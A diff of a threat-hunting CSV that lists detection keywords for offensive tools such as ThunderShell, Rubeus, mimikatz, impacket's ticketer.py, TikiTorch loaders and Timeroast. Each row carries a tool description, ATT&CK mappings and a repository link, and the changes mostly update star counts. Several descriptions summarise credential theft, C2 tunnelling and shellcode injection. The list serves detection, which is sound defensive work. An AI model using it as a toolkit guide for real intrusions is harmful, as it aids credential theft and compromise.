FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*ThunderDNS*.php*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.ps1*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.py*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS.git*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" -"*ThunderFox.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ThunderFox.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ThunderShell*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.git*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.py*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell-master.zip*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" -"*thycotic_secretserver_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*thycotic_secretserver_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*tiagorlampert*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/tiagorlampert","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ticket.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*ticket.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*ticket.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*ticketConverter.py *.ccache *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ticketConverter.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ticketConverter.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ticketer.py -nthash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ticketer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ticketer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ticketsplease adfs *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease azure *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease dcsync *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" @@ -17705,8 +17889,8 @@ "*ticketsplease ticket --domain*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease.modules.*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*TicketToHashcat.py*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*TicketToHashcat.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Tiger-192.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TicketToHashcat.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Tiger-192.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*tijme/kernel-mii*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*TikiLoader*Hollower*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" @@ -17725,13 +17909,13 @@ "*TikiSpawnWppid*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiTorch.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiVader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" -"*timemachine_cmd_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*timemachine_cmd_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*timeroast.ps1*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*timeroast.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" -"*timestomp c:*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and 